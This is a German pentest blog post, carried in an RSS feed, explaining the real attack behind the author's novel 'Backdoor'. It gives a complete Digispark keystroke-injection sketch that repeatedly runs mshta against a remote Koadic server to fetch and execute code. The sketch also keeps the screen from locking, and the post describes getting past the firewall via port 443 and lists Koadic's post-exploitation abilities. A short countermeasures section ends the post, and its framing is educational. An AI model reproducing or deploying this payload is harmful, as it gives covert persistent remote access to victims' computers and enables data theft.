		<category><![CDATA[Video]]></category>
		<category><![CDATA[Backdoor]]></category>
		<category><![CDATA[Digispark]]></category>
		<category><![CDATA[Keystroke-Injection]]></category>
		<category><![CDATA[Roman]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=4585</guid>

					<description><![CDATA[<p>Vor wenigen Tagen ist mein Roman &#8222;Backdoor&#8220; als E-Book und als Taschenbuch erschienen. Schon häufen sich die Fragen, ob diese [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/backdoor-roman-spoiler-alarm/">Backdoor Roman &#8211; Spoiler Alarm!</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Vor wenigen Tagen ist mein Roman &#8222;Backdoor&#8220; als <a href="https://www.amazon.de/Backdoor-Ein-Bundeswehr-Krimi-Frank-Neugebauer-ebook/dp/B08YXVVBYS/ref=sr_1_4" target="_blank" rel="noreferrer noopener">E-Book </a>und als <a href="https://www.amazon.de/Backdoor-Ein-Bundeswehr-Krimi-Frank-Neugebauer/dp/3753459194/ref=sr_1_6" target="_blank" rel="noreferrer noopener">Taschenbuch </a>erschienen. Schon häufen sich die Fragen, ob diese Backdoor tatsächlich mit einem so kleinen Gerät erzeugt werden kann. Schließlich hat  der Digispark nur 6 Kilobyte Speicherplatz zur Verfügung.</p>



<p>Tatsächlich brauchte es nicht viel, um die Backdoor mittels Keystroke-Injection zu erzeugen. Zu diesem Zweck könnte man <strong>mshta.exe</strong> verwenden. Diese Datei ist standardmäßig im Windows-Betriebssystem vorhanden und braucht daher nicht erst auf das Zielobjekt übertragen zu werden.</p>



<p>MsHTA&nbsp;steht für&nbsp;<strong>M</strong>icro<strong>s</strong>oft&nbsp;<strong>HT</strong>ML&nbsp;<strong>A</strong>pplication. Dieser Prozess gilt als sicher und stellt normalerweise keine Gefahr für ein Windows-System dar. Die Datei &#8218;mshta.exe&#8216; befindet sich standardmäßig im Ordner <em>C:\Windows\System32</em> und kann problemlos mit Nutzerrechten aufgerufen werden.<br></p>



<h3 class="wp-block-heading">Wie läuft der Angriff ab?</h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="590" src="https://pentestit.de/wp-content/uploads/2021/03/koadic_2-1024x590.jpg" alt="" class="wp-image-4619" srcset="https://pentestit.de/wp-content/uploads/2021/03/koadic_2-1024x590.jpg 1024w, https://pentestit.de/wp-content/uploads/2021/03/koadic_2-1536x884.jpg 1536w, https://pentestit.de/wp-content/uploads/2021/03/koadic_2-300x173.jpg 300w, https://pentestit.de/wp-content/uploads/2021/03/koadic_2-768x442.jpg 768w, https://pentestit.de/wp-content/uploads/2021/03/koadic_2.jpg 1676w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p><br><br>Ohne den neuen Lesern die Spannung zu nehmen, kann man verraten, dass mithilfe des Digisparks (1) eine Verbindung zum Angreifer hergestellt wird. Um die Firewall zu umgehen, sollte dies über einen Port geschehen, der für den Verkehr von innen nach außen geöffnet ist. Das könnte z.B. Port 443 sein, der vorrangig für das Surfen im Internet benutzt wird. Das Zielsystem, als Beispiel wird hier ein Windows-10-PC genutzt, ruft die Webseite &#8222;<em>http://112.23.137.77:443/eagle</em>&#8220; auf. Im Skript kann man sehen, dass dies automatisch mittels Keystroke-Injection passiert. (IP-Adresse ist fiktiv).</p>



<p>Der Server (2) mit der IP-Adresse 112.23.137.77 nimmt die Verbindung an und stellt eine permanente Verbindung zum Zielobjekt her. Hierzu wird die Software Koadic verwendet, die diese Verbindungen als &#8222;Zombies&#8220; verwaltet. Ich habe das Post-Exploitation-Framework bereits in <a href="https://www.rheinwerk-verlag.de/hacking-und-security-das-umfassende-handbuch/" target="_blank" rel="noreferrer noopener">unserem Buch,</a> in einem <a href="https://pentestit.de/ix-01-2020-postexploitation-mit-koadic-und-merlin/" target="_blank" rel="noreferrer noopener">Artikel der iX</a> und auf <a href="https://pentestit.de/?s=koadic" target="_blank" rel="noreferrer noopener">dieser Webseite </a>ausführlich vorgestellt. </p>



<p></p>



<h3 class="wp-block-heading">Welche &#8222;Hürden&#8220; müssen überwunden werden. </h3>



<ol class="wp-block-list"><li>Keystroke-Injektion funktioniert natürlich nur, wenn ein Nutzer sich im System angemeldet hat und den Bildschirm frei für Eingaben macht. Ist er gesperrt, so bring z.B. das Tastenkürzel Windows+R, welches den &#8222;Ausführen-Dialog&#8220; öffnet, nicht den gewünschten Effekt. </li><li>Ist der PC einmal offen, so kann es sein, dass der Nutzer das Gerät nach einer gewissen Zeit wieder verlässt. In der Regel greift dann der Bildschirmschoner, der das Gerät nach einer vorgegebenen Zeit automatisch sperrt. </li><li>Ist das Zielsystem ausgeschaltet, so kann selbstverständlich keine Verbindung zum Angreifer aufgebaut werden. Hier müssen wir gewährleisten, dass nach dem Einschalten und während der Nutzung immer wieder neue Verbindungen zum Angreifer aufgebaut und neue &#8222;Zombies&#8220; erstellt werden.</li></ol>



<p></p>



<h3 class="wp-block-heading">Digispark &#8211; &#8222;Der Wolf im Schafspelz&#8220;</h3>



<p>Digispark&nbsp;ist eine&nbsp; Entwicklungsplatine auf Basis eines Attiny85.  Er lässt sich direkt mit dem USB-Port eines Rechners verbinden und mit der Arduino-Entwicklungsumgebung&nbsp; programmieren.</p>



<h4 class="wp-block-heading"><strong>Technische Details:</strong></h4>



<ul class="wp-block-list"><li>Unterstützt die Arduino IDE (erhältlich für OSX/Win/Linux)</li><li>Stromversorgung über USB oder eine externe Quelle –&nbsp;<strong>5V oder 7-35V</strong>&nbsp;</li><li>On-board 500mA 5V Regler</li><li>Built-in USB</li><li><strong>6 I/O Pins</strong>&nbsp;</li><li><strong>8kB Flash-Speicher</strong>&nbsp;(ca. <strong>6kB effektiv </strong>verfügbar)</li><li><strong>I2C</strong>&nbsp;und&nbsp;<strong>SPI</strong></li><li><strong>PWM</strong>&nbsp;auf 3 Pins </li><li>ADC auf 4 Pins</li><li><strong>Power LED</strong> und Test/Status LED (auf Pin 0)</li></ul>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://pentestit.de/wp-content/uploads/2021/03/Bildschirmfoto-2021-03-28-um-11.37.21-1024x509.jpg" alt="" class="wp-image-4609" width="341" height="169" srcset="https://pentestit.de/wp-content/uploads/2021/03/Bildschirmfoto-2021-03-28-um-11.37.21-1024x509.jpg 1024w, https://pentestit.de/wp-content/uploads/2021/03/Bildschirmfoto-2021-03-28-um-11.37.21-300x149.jpg 300w, https://pentestit.de/wp-content/uploads/2021/03/Bildschirmfoto-2021-03-28-um-11.37.21-768x382.jpg 768w, https://pentestit.de/wp-content/uploads/2021/03/Bildschirmfoto-2021-03-28-um-11.37.21.jpg 1292w" sizes="auto, (max-width: 341px) 100vw, 341px" /></figure>



<p></p>



<h3 class="wp-block-heading">Arduino Entwicklungsumgebung</h3>



<p>In diesem <a href="https://pentestit.de/digispark-die-usb-rubber-ducky-alternative-teil1/" target="_blank" rel="noreferrer noopener">Beitrag</a> habe ich gezeigt, wie Sie die Arduino Entwicklungsumgebung für den Digispark in einem Windows-Betriebssystem einrichten. Wer lieber mit Linux arbeitet, wird im <a href="https://www.rheinwerk-verlag.de/hacking-und-security-das-umfassende-handbuch/" target="_blank" rel="noreferrer noopener">Buch</a> eine entsprechende Anleitung finden.</p>



<p><strong>Achtung:</strong> Da die Originaldateien auf das US-Tastaturlayout zugeschnitten sind, müssen Nutzer einer deutschen Tastatur folgende Dateien austauschen:</p>



<ul class="wp-block-list"><li>DigiKeyboard.h</li><li>scancode-ascii-table.h</li></ul>



<p>Sie werden diese Dateien ja nach Betriebssystem und Installation in den Nutzerdaten finden. In meiner Entwicklungsumgebung unter Windows wurde ich hier fündig:</p>



<p><em>C:\Users\frank\AppData\Local\Arduino15\packages\digistump\hardware\avr\1.6.7\libraries\DigisparkKeyboard</em></p>



<p>Laden Sie die Dateien für ein deutsches Tastaturlayout <a href="https://pentestit.de/wp-content/uploads/2021/03/DigiKeyboard.zip">hier herunter</a>.</p>



<p></p>



<h3 class="wp-block-heading">Dieses Skript soll helfen, die Probleme zu lösen</h3>



<p>Die Variable &#8222;interval&#8220; gewährleistet, dass das Zielsystem alle  30 Minuten eine neue Verbindung zum Angreifer aufnimmt. Die Werte sind in Millisekunden anzugeben.</p>



<p>Wir gehen die diesem Beispiel davon aus, dass der Bildschirm nach ca. zwei Minuten Inaktivität, automatisch gesperrt wird. Wenn jede Minute etwas auf der Tastatur passiert, dann sollte dies nicht der Fall sein. Die  Variable &#8222;antiscreensaver&#8220; legt fest, in welchem Zeitintervall, zu diesem Zweck, die Leertasten und  Backspacetaste &#8222;gedrückt&#8220; werden.  Dies hat zur Folge, dass der Bildschirmschoner nicht aktiviert wird und weitere Verbindungsaufnahmen stattfinden können.  Nach Möglichkeit sollten Sie diese Zeitspanne, je nach den Einstellungen auf dem Zielsystem, etwas größer wählen.</p>



<p></p>



<pre class="wp-block-code"><code>#include "DigiKeyboard.h"

long previousMillis = 0;
long interval = 1800000;        //  30 minutes
long antiscreensaver = 60000;   //   1 minute

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);
  unsigned long currentMillis = millis();
  if(currentMillis - previousMillis &gt; interval) {
     DigiKeyboard.delay(2000);
     DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
     DigiKeyboard.delay(2000);
     DigiKeyboard.println("cmd /c start /MIN mshta http://112.23.137.77:443/eagle");
     previousMillis = currentMillis;
  }
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_SPACE);
  DigiKeyboard.sendKeyStroke(KEY_BACKSPACE);
  DigiKeyboard.delay(antiscreensaver);
}
</code></pre>



<p></p>



<h3 class="wp-block-heading">Post-Exploitation-Framework einsetzen</h3>



<p>Mit Koadic haben Sie nun alle Möglichkeiten auf dem Zielsystem zu agieren. Das Werkzeug liefert Module, um auf Zielsystem zuzugreifen, Daten zu kopieren oder die Rechte zu erweitern.</p>



<p>Die diesem Beispiel wurde ein Kommando-Shell geöffnet und der Dateninhalt angezeigt.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="809" src="https://pentestit.de/wp-content/uploads/2021/03/koadic-1024x809.jpg" alt="" class="wp-image-4593" srcset="https://pentestit.de/wp-content/uploads/2021/03/koadic-1024x809.jpg 1024w, https://pentestit.de/wp-content/uploads/2021/03/koadic-1536x1213.jpg 1536w, https://pentestit.de/wp-content/uploads/2021/03/koadic-300x237.jpg 300w, https://pentestit.de/wp-content/uploads/2021/03/koadic-768x606.jpg 768w, https://pentestit.de/wp-content/uploads/2021/03/koadic.jpg 1788w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p></p>



<h3 class="wp-block-heading">Gegenmaßnahmen</h3>



<p>Es ist im täglichen Betrieb nicht leicht, einen Digispark zu finden, der in eine freie USB-Schnittstelle gesteckt wurde. Regelmäßige Kontrollen würden hier natürlich helfen. <br>Außerdem ist das oben gezeigte Skript nicht perfekt. Auch wenn jemand mehr &#8222;Herzblut&#8220; in die Sache steckt, wird es immer ein Keystroke-Injection-Angriff bleiben. Dies bedeutet, dass der Angreifer Befehle ausführen wird, die möglicherweise auf dem Bildschirm sichtbar sind.<br>Wenn der Bildschirmschoner nicht startet oder der Bildschirm nicht automatisch gesperrt wird, sollten der Nutzer stutzig werden und der Sache nachgehen. <br>Ein Virenschutzprogramm auf einem Windows-System könnte eventuell den Angriff erkennen und abwehren.<br>Wer einen Proxy-Server für die Verbindung ins Internet nutzt und hier sogar eine Authentifizierung gewählt hat, sollte ebenfalls auf der sicheren Seite sein.</p>



<p>Das folgende Video zeigt, was vom Angriff für den Nutzer zu sehen ist und welche Schritte ein Angreifer unternimmt, um wichtige Dateien herunterzuladen:</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">
<iframe loading="lazy" title="Digispark -  find the important file" width="1280" height="720" src="https://www.youtube.com/embed/yofFo_BESgU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div></figure>
<p>Der Beitrag <a href="https://pentestit.de/backdoor-roman-spoiler-alarm/">Backdoor Roman &#8211; Spoiler Alarm!</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/backdoor-roman-spoiler-alarm/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
